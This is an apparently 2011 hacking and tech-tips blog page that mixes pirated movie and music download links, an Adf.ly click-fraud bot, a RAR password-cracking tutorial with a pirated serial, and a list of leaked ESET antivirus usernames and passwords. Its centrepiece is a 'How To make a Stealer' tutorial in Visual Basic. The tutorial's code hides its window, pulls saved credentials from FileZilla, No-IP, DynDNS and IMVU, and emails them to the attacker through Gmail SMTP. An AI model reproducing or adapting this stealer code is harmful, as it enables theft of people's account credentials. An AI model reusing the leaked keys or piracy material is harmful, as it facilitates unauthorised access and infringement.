' name='google-site-verification'/> 2011 | SOURCE CODE

[ Site Info ]

BloggerMates

Related Posts Plugin for WordPress, Blogger...

FOLLOWERS

[ Followers ]

[ Partner Link ]

portbloger.co.cc

[ Recent Comments ]

[ Advertiser ]

DMCA Protection Status

About

Ghazanfar Ali Naqvi

Pageviews

Google Talk

NetworkedBlogs

Google Translater

English French German Spain Italian Dutch Russian Portuguese Japanese Korean Arabic Chinese Simplified

this widget by www.portbloger.co.cc

Desktop Codee © Custom Search

Loading

LIVE TV

Make Money Using your Facebook Account 1000%




Download Link 


      Note:- Password : Contact Me On My Email ghazanfar.ali5@yahoo.com   Skype Id : ghazanfar12         



Adf.ly bot 100% working - make money in minutes



Adf.ly bot


Adf.ly bot 100% working - make money in minutes

Here is a Adf.ly bot that increase your clicks and you can make money easily in minutes.

use it with working proxies in file.

New Proxies List updated

Download now

Reporting a bug - Blogger Help

Eminem Ass Like That


Code:
http://www.filefactory.com/file/cc87efc/n/Eminem-Ass_Like_That.mpg
Code:
http://www.wupload.com/file/64269342/Eminem-Ass

Lady Gaga - Born This Way 1080P


This image has been resized. Click this bar to view the full image. The original image is sized 1024x646.



Download LInk


Code:
http://uploading.com/files/fmb7f5b8/lady.gaga-born.this.way.webrip.x264.1080p.mp4/

X-Men: First Class (2011) [Dual Audio] (Hindi-English) R5 DVDRip [TDT] * AF *







Credit to Ripper




Code:
http://www.imdb.com/title/tt1270798/



Code:
http://cramit.in/jzgtvwqip977

Buy A Premium Account From My Link To Support My Upload


Harry Potter and the Deathly Hallows: Part 2 (2011) [Dual Audio] (Hindi-English) TSRip [TDT] * AF *


This image has been resized. Click this bar to view the full image. The original image is sized 1200x1081.



Credit to Ripper





Code:
http://www.imdb.com/title/tt1201607/



Code:
http://cramit.in/kvikal1ouyhd

Buy A Premium Account From My Link To Support My Upload


Counter Strike 1.6 1000 FPS Server Made by Ghazanfar Ali Naqvi

How To Create A Free PPTP VPN | VPN Service For Everybody


A PPTP (Point-to-Point Tunneling Protocol) based VPN service has the benefit of easy configuration and the ability to work on all popular desktop and mobile platforms out-of-the-box without requiring any third-party client application, if you did not got a chance to have your own free PPTP VPN account
in earlier giveaways – free VPN service proXPN is here for you. The free service allows users to browse the web securely and anonymously via an encrypted VPN tunnel having USA IP perfect to bypass country specific restrictions like watching Hulu and restricted Youtube videos from outside USA.
http://blog.recipester.org/wp-content/uploads/2010/04/041.png


[TuT] Crack Rar passwords

What's Brute Force?

Brute force attack is a strategy used to break the encryption of data. It involves traversing the search space of possible keys until the correct key is found. (Wikipédia)

What will you need?

WinRar -- http://www.baixaki.com.br/download/winrar.htm
Advanced Archive Password Recovery 4.53 -- http://www.sharewareconnection.com/advan...covery.htm

If you want a full version of the program you'll have to download the version "Pro 4.00"
Serial:
ARCHPR-TBHW5SSMYGQS-GNGD56ZSWN7NZ4UG

Download and install them!

First of all you'll open "Advanced Archive Password Recovery"

Then go to the lenght tab and edit the "Max Lenght" to 20, click open and choose the protected file!
hen you should see a progress bar loading and when the program finds the correct password

How To make a Stealer

Open Visual Basic:

Click File > Click then New Project > Choose Windows Application > Choose name > Click Ok

From the Toolbox drag:

* Button1 = Build
* TextBox1
* TextBox2
* Label1- Change text to: Gmail Username:
* Label2- Change text to: Gmail Password:

Now when you add all these, on top of code add:

Code:
Imports System.IO

Now under Public Class Form1 add following code, that would be strings:

Code:
Dim stub, text1, text2 As String
Const FileSplit = "@OriginalCoder/Cyberhackers.org@"
Now lets move to source code part, double click Button1= Build Button and write:

Code:
text1 = TextBox1.Text
text2 = TextBox2.Text
FileOpen(1, Application.StartupPath & "\Stub.exe",

OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
stub = Space(LOF(1))
FileGet(1, stub)
FileClose(1)
If File.Exists("Server.exe") Then
My.Computer.FileSystem.DeleteFile("Server.exe")
End If
FileOpen(1, Application.StartupPath & "\Server.exe",

OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
FilePut(1, stub & FileSplit & text1 & FileSplit & text2)
FileClose(1)

Wow the Builder is done!
Now we need to make the stub!

Now you got your builder and now lets move to Stub.

* Run Visual Basic
* In Tab click File > New Project
* Windows Application > "Stub" > Click Ok


From the Toolbox add:

* Textbox2 - Gmail Username
* Textbox3 - Gmail Password


Now when you add all these, on top of code add:

Code:
Imports System.IO
Imports System.Net.Mail
Imports Microsoft.Win32

Now under Public Class Form1 add following code, that would be strings:
Code:
Dim options(), text1, text2 As String
Dim filezillaPass as String = ShoitZilla()
Dim NoipPass as String = IpRecord()
Dim dyndnsPass as String = GoogleDns()
Dim imvuPass as String = DoToVu
Dim pidginPass as String = PidginRec()
Dim result As Integer
Const FileSplit = "@OriginalCoder/Cyberhackers.org@"



Now double click Form1 and write following code:
Code:
me.hide
me.visible = false
dim nl as string = vbnewline
Dim MailSetup As New MailMessage
MailSetup.Subject = My.Computer.Name & ":"
MailSetup.To.Add(TextBox2.Text)
MailSetup.From = New MailAddress(TextBox2.Text)
MailSetup.Body = filezilapass & nl & noippass & nl & dyndnspass & nl _
& imvupass & nl & pidgin & nl & "Do not Share this Tutorial in Other Community's Please! If you want me to Keep posting Source Codes and Tutorials."
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New Net.NetworkCredential(TextBox2.Text, TextBox3.Text)
SMTP.Send(MailSetup)
And add All these Functions to the source code:

FileZilla:
Code:
Function ShoitZilla() As String
On Error Resume Next
Dim FilePath As String = Environ("APPDATA") & "\FileZilla\recentservers.xml"
Dim FileBuffer As String = vbNull
Dim NL As String = vbNewLine
FileBuffer = My.Computer.FileSystem.OpenTextFileReader(FilePath).ReadToEnd()
Dim str As String
Dim Output As String = Nothing
Dim TempData() As String
TempData = FileBuffer.Split(vbCrLf)
FileBuffer = Nothing
For Each str In TempData
If str.Contains("</Host>") Then
str.Replace("<Host>", "").Replace("</Host>", "")
Output = Output & "Host : " & str & NL
End If
If str.Contains("</User>") Then
str.Replace("<User>", "").Replace("</User>", "")
Output = Output & "Username : " & str & NL
End If
If str.Contains("</Pass>") Then
str.Replace("<Pass>", "").Replace("</Pass>", "")
Output = Output & "Password : " & str & NL & NL
End If
Next
Output = Output.Replace("<User>", "").Replace("</User>", "").Replace("<Host>", "").Replace("</Host>", "").Replace("<Pass>", "").Replace("</Pass>", "")
ShoitZilla = Output
End Function

No-Ip
Code:
Public Function base64Decode(ByVal data As String) As String
Try
Dim encoder As New System.Text.UTF8Encoding()
Dim utf8Decode As System.Text.Decoder = encoder.GetDecoder()
Dim todecode_byte As Byte() = Convert.FromBase64String(Data)
Dim charCount As Integer = utf8Decode.GetCharCount(todecode_byte, 0, todecode_byte.Length)
Dim decoded_char As Char() = New Char(charCount - 1) {}
utf8Decode.GetChars(todecode_byte, 0, todecode_byte.Length, decoded_char, 0)
Dim result As String = New [String](decoded_char)
Return result
Catch e As Exception
Throw New Exception("Error in base64Decode" & e.Message)
End Try
End Function
Function IpRecord() As String
IpRecord = Nothing
Dim Username As String = My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC", "Username", Nothing)
Dim Password As String = My.Computer.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC", "Password", Nothing)
Dim NL As String = vbNewLine
IpRecord = "Username : " & Username & vbNewLine & "Password : " & base64Decode(Password) & vbNewLine
End Function
DynDNS:
Code:
Public Function GoogleDns() As String
On Error Resume Next
GoogleDns = Nothing

Dim sAppData As String
Dim sPath As String
Dim sLine As String
Dim sUser As String = Nothing
Dim sPassword As String = Nothing
Dim i As Integer
Dim sChars As String = Nothing
Dim lPtr As Integer

sAppData = Environ("ALLUSERSPROFILE")

If Right(sAppData, 1) <> "\" Then sAppData = sAppData & "\"

sPath = sAppData & "DynDNS\Updater\config.dyndns"

'UPGRADE_WARNING: Dir has a new behavior. Click for more: 'ms-help://MS.VSCC.v90/dv_commoner/local/redirect.htm?keyword="9B7D5ADD-D8FE-4819-A36C-6DEDAF088CC7"'
If Dir(sPath) <> "" Then
FileOpen(1, sPath, OpenMode.Binary)
Do While Not EOF(1)
sLine = vbNullString
sLine = LineInput(1)
If Left(sLine, 9) = "Username=" Then sUser = Mid(sLine, 10)
If Left(sLine, 9) = "Password=" Then
sPassword = Mid(sLine, 10)
'We have what we want, now exit do
Exit Do
End If
Loop
FileClose(1)

For i = 1 To Len(sPassword) Step 2
sChars = sChars & Chr(Val("&H" & Mid(sPassword, i, 2)))
Next i

For i = 1 To Len(sChars)
Mid(sChars, i, 1) = Chr((Asc(Mid(sChars, i, 1))) Xor (Asc(Mid("t6KzXhCh", lPtr + 1, 1))))
lPtr = ((lPtr + 1) Mod 8)
Next i

GoogleDns = "Username : " & sUser & vbNewLine & "Password : " & sChars & vbNewLine
End If
End Function

IMVU:
Code:
Function ReadKey(ByRef hKey As String) As Object ' // Function for Read REG Values
On Error GoTo Error_Renamed ' // If Error dont Display Error
Dim X As Object ' //
X = CreateObject("WScript.shell") ' // Create REG Object
ReadKey = X.regread(hKey) ' // Read The Key
Exit Function
Error_Renamed: ReadKey = vbNullString ' // If Error Readkey = ""
End Function
Public Function Hex2Ascii(ByVal Text As String) As String
Dim Value As Object
Dim num As Object
Dim i As Object ' // Simple Function for Pass Hex to Ascii
Value = Nothing
For i = 1 To Len(Text) ' Len of Encripted Text
num = Mid(Text, i, 2) ' // Go Chr by Chr
Value = Value & Chr(Val("&h" & num)) ' // Pass from Hex
i = i + 1 ' // +1
Next i ' Next Chr

Hex2Ascii = Value ' //
End Function
Public Function DoToVu() As String
Dim sUser, sPass As String ' // Some Variables
sUser = "HKEY_CURRENT_USER\Software\IMVU\username\" ' // Username REG Path
sPass = "HKEY_CURRENT_USER\Software\IMVU\password\" ' // Password REG Path
DoToVu = "IMVU : " & vbNewLine & "Username : " & ReadKey(sUser) & vbNewLine & "Password : " & Hex2Ascii(ReadKey(sPass))

Exit Function

Done ur stealer ready

Give us feedback

ESET Nod32 Username And Password

Username: EAV-46303228
Password: t77junue4f
Expiration: 16/09/2011

Username: EAV-46303230

Password: ucx6jjfmdp
Expiration: 16/09/2011

Username: EAV-46464902

Password: xrkbnpmbrf
Expiration: 20/09/2011

Username: EAV-46464902

Password: xrkbnpmbrf
Expiration: 20/09/2011

Username: EAV-46464923

Password: 3c5k8x5a48
Expiration: 20/09/2011

Username: EAV-46465425

Password: krenau2mdv
Expiration: 20/09/2011

Username: EAV-46465426

Password: e88d6xb6pb
Expiration: 20/09/2011

Username: EAV-46465453

Password: ad2mbmept7
Expiration: 20/09/2011

Username: EAV-46465453

Password: ad2mbmept7
Expiration: 20/09/2011

Username: EAV-46466519

Password: tfnjkdhakk
Expiration: 20/09/2011

Username: EAV-46467112

Password: vmbtdvkpfs
Expiration: 20/09/2011

Username: EAV-46503430

Password: jph5e6vn4j
Expiration: 21/09/2011

Username: EAV-46503435

Password: b8r44mhaun
Expiration: 21/09/2011

Username: EAV-46503437

Password: 3k7d37hnbj
Expire Date: 21/09/2011

Username: EAV-46515177

Password: 5m58msv4ts
Expire on: 22/09/2011

Username: EAV-46515191

Password: hp2cp6fcur
Valid Until: 22/09/2011

5000 Templates Web Developer

The Best Way To Download Files with Many Links From Rapidshare


Cool The Best Way To Download Files with Many Links From Rapidshare

Here U can Find the Easiest Way to Downlaod Rapidshare Links Specially with releases which have many Links 




Let me make it easy and clear :

First , if u don't have Rapidshare premium account , I can't help u at all mate , u need to download each separately and that will take a lot of time from u and hard work .

Note :

[ If u want to buy rapidsahre premium account , please buy it from my link ( to support me please
  ) :

Click Here


Go down and choose premium and u need paypal to buy it ]
.

Thanks a lot for supporting us 
:yup:



Second , if u have a rapidshare premium account , then this thread worth gold for u  just follow the steps here which attached with pictures for Convenience Descriptions .








Please follow The pictures ( U need a RapidShare premium account + Program = Internet Download Manager u can get it from HERE ) :



Steps :


1- This is the interface of the program :




2- Press on The Option Button where we will make important changes .





3- Press on connections and follow the pictures
( this step helps get u high speeds when u download from rapidshare )







To see the rest please post a reply say thanks .


[HIDE]

4- Go to sites logins to add ur rapidshare info
( to automatically download as a premium user without choosing each time that u have a premium user )







5- After u added ur account details , it will be shown as following :




6, and the final step - Now , Internet Download Manager ( IDM ) Is ready to go. u can add thousands of links and order them to start downloading in queue . to add the links to the program ( IDM ) u have to copy all links and add them to a txt file , then import them ( as the following pictures shows ) to IDM . When u see that all links are added , u can press on queue button to start a queue and start downloading 2 ( or maybe 4 ) in a time , when they're finished , the next 2 ( or maybe 4 ) will start  .







[/HIDE]

I hope u will find this Description useful .
If u thought about Buying a Rapidshare account , Please Buy it from my links to
 Support Me
 :happy: .

If U want to buy via My links ( to support me ) please click on the following link and buy a premium account  :
Internet Download Manager v5.14.3 WinAll Incl Keygen and Patch-CRD

Make your own cs 1.6 server


Make your own cs 1.6 server

This guide is for Windows users only

First of all you'll need to download hlds_v1120.exe there: Cs-amx - Aide &#224; la configuration serveur !!!! ( Pseudo: Doggy / Pw: latnessearch ) ( scanned and no virus )
Now you have it click on instal it and put it in the folder that they ask you .. HLServer
Now go in the folder HLServer and delete ClientRegistry.blob

Ok open your command Prompt and write " cd c:\HLServer " press enter, then you have to write " HldsUpdateTool.exe -command update -dir c:\HLServer "
When it's complet don't close your command prompt and write that: " HldsUpdateTool.exe -command update -game "cstrike" -dir c:\HLServer "

Now you need to copy your hlds.exe in your HLServer and put it on your desktop.
On your shortcut you'll need to right click it and go in the section properties and in Cible you will have to write: " C:\HLServer\hlds.exe -console -game cstrike +maxplayers 12 +map de_dust2 +port 27015 "

To Stop your server you'll need to write Exit then enter


Ok lets fix some bug

Go in cstrike that is located in your HLServer folder
Creat these 4 new documents in it
- language.cfg
- config.cfg
- listip.cfg
- banned.cfg

be sure that they are setted as .cfg file ..
Then reset your server and it should work correctly

You only need to forward these ports:
• 27000 &#224; 27015 en UDP
• 1200 en UDP
• 27020 &#224; 27039 en TCP

Credit: Ghazanfar Ali Naqvi

Memory Vs Virus (slow down PC)

Many users have noticed that their machines often slow down for no apparent reason. This may be virus related, or it may be a memory problem. Determining which one isn't very hard for the experienced user, but the inexperienced might have some difficulty. It's important to recognize the difference between malicious software, and lacking hardware.

While viruses can certainly make your computer run slow, there are usually other signs that accompany them. New icons on your desktop, odd behaviors, and programs telling you your machine is infected that you didn't install. These are all symptoms of a virus and can slow your machine down. However there is one other explanation for these slow downs that you need to consider.

I'm talking about your system memory, or RAM. RAM is an acronym that stands for Random Access Memory and is very important to your computer. Regardless of what operating system you use every machine uses RAM. When you save a document or project that you have been working on it is saved to the computers hard disk also known as a hard drive.

When your computer loads a program it is loaded into the systems RAM. Unlike a hard drive which is static memory, a RAM stick is volatile memory. When the power is turned off to your machine the information stored on the hard disk stays stored, whereas what's loaded into the RAM is erased. RAM is primarily used as a temporary storage medium on your machine to load and execute programs or commands.

Insufficient RAM can lead to your system slowing down, sometimes severely due to the requirements. For example, an older operating system may only need a minimum of 256 megabytes of RAM to function. This is the bare minimum without any noticeable slowdowns, you won't be doing much, but the machine will work. A newer operating system may require 1 gigabyte of RAM minimum, a gigabyte being 1024 megabytes.

Trying to install and run this operating system on a computer with 256 megabytes of RAM is not going to work well. The reason for this is that as operating systems advance there are a greater volume of programs that need to be loaded into the RAM. When you play a movie in a media player the movie is loaded into RAM for easy playback. Insufficient RAM leads to stuttering in movie playback, and requires you to pause until the system catches up.

When you don't have enough RAM the system uses what is known as virtual memory. This is a section of your hard drive that your operating system designates as temporary RAM. Nothing is kept permanently on this area, but it is much slower. It's generally a good idea to have double the amount of RAM your operating system requires to ensure the best performance.

Slowdowns from insufficient RAM or system memory can also affect web browsing, gaming, be the cause of errors, and other computer headaches. While it does resemble a virus in some aspects, it can be solved much easier. You simply buy a RAM stick, and plug it into an open slot. Or you buy a higher capacity RAM chip and replace your existing one.

Disable Recent Documents History to Boot Windows Faster, Also Maintain Your Privacy


The Recent Documents folder on the Windows XP Start menu displays a list of files and documents that you most recently used. But if you are not using this feature, it is best to disable it since it will reduce the time it takes to boot Windows plus when you are sharing the computer, you won’t leave any tracks behind.

Note: This should work on Vista & 7 as well, though I have not tried it.




Here’s how to disable the recent documents history:

1]- Type regedit in the Start/Run window.
2]- Navigate to HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer.
3]- Create a new DWORD value, or modify the existing value of NoRecentDocsHistory by double clicking.
4]- Set the Data Value to 1. Save the value and close the registry editor.
The next time you start Windows, your recent documents folder would remain empty and won’t track your open documents; Windows will Boot faster and all your sessions on the PC will have 100% privacy.

Make an Undeleteable Folder in windows

It often happens that some of your folders contain very important data and you delete those folders by mistake. So why not make such folders UNDELETEABLE & avoid such mistakes..! [Works with Windows XP|Vista|Seven]



1]- Open CMD ( Type in Run option, the command ‘cmd’ or navigate to All Programs->Accessories-> Command Prompt)

2]- Change the directory to where you want to create the folder.Type ‘cd..’ to exit the current directory. As an example i will be creating the folder in C:, so i will use the ‘cd..’ command twice to navigate to C:

3]- Type md\lpt1\\ and press enter, the folder now will be in your C:

4]- If you try to delete it, it wont delete. This works on all version of windows.
5]- If you want to delete it just go to ‘CMD’, navigate to the directory and type
rd\lpt1\\ and press Enter.

Increase PC Performance and Speed & Optimize your Internet Connection

Our PC slows down with time as we run more and more applications on it because the RAM gets full of remaining process pieces that you do not need any more.
Moreover our Internet connection is also not optimized to utilize its full potential.
So here in this article you will learn How to Increase your PC Speed as well as Optimize your Internet Connection.


Well I have divided this article into 2 parts-
1]- Increase your PC Speed by cleaning your RAM
  • Open the notepad and type- FreeMem=Space(64000000)
  • Save it as RAMcleaner.vbs [ You should choose the “All Files” option when u save it ]
  • Run the file and your RAM will be cleaned of unwanted processes.
  • You can also edit the code for a greater “cleaning-progress”.
  • Example- FreeMem=Space(128000000)
2]- Increase Internet speed by optimizing your Internet Connection
  • Open Device Manager [Vista/Seven: Right Click on My computer > properties > Click on Device Manager in Left Hand Side Menu | Xp: Right Click on My Computer > Properties > Hardware Tab > Device Manager]
  • Locate Ports and expand it by double clicking on it.
  • Open all the ports listed under PORTS by double clicking on them.
  • Now go to the Port Setting and make these changes:
  1. On “Bits per second” change to 128000
  2. And “Flow control” option change to Hardware
  3. Apply and see the result.

Increase Gaming Performance of your PCIncrease the performance of your PC while playing games or running other heavy applications.By applying this trick you can run your games at upto 10 Fps faster. Add ‘Start High Priority’ in File Context Menu and run all these heavy applications as High priority. There are various steps to achieve this. I advise you to read all these very carefully. This has been tested on Windows7 and Vista both 32 Bit. This includes editing the registry. I know what i have written here but still if you screw up by your foolishness then dont blame me. Here we begin: 1]- Open the registry editor by writing Regedit in the Run cammand. (Or Win Key+R to get Run Window.) 2]- Locate ‘HKEY_CLASSES_ROOT’. Click on it & it will expand. See the screenshot. 3]- Scroll down until you see the ‘exefile’ key. Click it & it will expand. Then locate ’shell’. See the screenshot. 4]-Right click on ’shell’. Select ‘NEW’ . Then Select ‘KEY’ . After noticing the new key named ‘new key #1′ change the name to XQSHP . See the screenshot. 5]- Now Click on the XQSHP key and on the right you will see Default. Double click on it. 6]- You’ll see a new dialogue box popped up. Write down the following : Start &High priority Click OK 7]- Now we have to repeat this process. 8]- Right click on XQSHP key & then select NEW & Select KEY & Name it Command . See the screenshot. 9]- Now click on command and double click on default to your right. 10]- On the popup Dialogue box you need to select & write down one of these: A- FOR 32 BIT Operting System- C:\Windows\System32\cmd.exe /c start “XQSHP” /high “%1″ B- FOR 64 BIT Operting System C:\Windows\SysWow64\cmd.exe /c start “XQSHP” /high “%1″ 11]- And we are done. Ah! a little lengthy but worth doing it. Enjoy your Games and Heavy Apps now! Now simply right click on the executable file and select run as high priority as shown.

Increase the performance of your PC while playing games or running other heavy applications.By applying this trick you can run your games at upto 10 Fps faster. Add ‘Start High Priority’ in File Context Menu and run all these heavy applications as High priority.




There are various steps to achieve this. I advise you to read all these very carefully. This has been tested on Windows7 and Vista both 32 Bit. This includes editing the registry. I know what i have written here but still if you screw up by your foolishness then dont blame me. Here we begin:
1]- Open the registry editor by writing Regedit in the Run cammand. (Or Win Key+R to get Run Window.)


2]- Locate ‘HKEY_CLASSES_ROOT’. Click on it & it will expand. See the screenshot.


3]- Scroll down until you see the ‘exefile’ key. Click it & it will expand. Then locate ’shell’. See the screenshot.


4]-Right click on ’shell’. Select ‘NEW’ . Then Select ‘KEY’ . After noticing the new key named ‘new key #1′ change the name to XQSHP . See the screenshot.


5]- Now Click on the XQSHP key and on the right you will see Default. Double click on it.







6]- You’ll see a new dialogue box popped up. Write down the following : Start &High priority

Click OK



7]- Now we have to repeat this process.

8]- Right click on XQSHP key & then select NEW & Select KEY & Name it Command . See the screenshot.


9]- Now click on command and double click on default to your right.
10]- On the popup Dialogue box you need to select & write down one of these:
A- FOR 32 BIT Operting System-

C:\Windows\System32\cmd.exe /c start “XQSHP” /high “%1″
B- FOR 64 BIT Operting System

C:\Windows\SysWow64\cmd.exe /c start “XQSHP” /high “%1″

11]- And we are done. Ah! a little lengthy but worth doing it. Enjoy your Games and Heavy Apps now! Now simply right click on the executable file and select run as high priority as shown.
Author

Ghazanfar Ali Naqvi

Hi`i'm Ghazanfar Ali Naqvi ,from Pakistan,i love to blogging, Desing Blogger template, Web Developing and Designing.i like to learn and share technical hacking/security tips with you,i love my friends.Spread the Love Black_Twitter_Bird

Follow Me on facebook!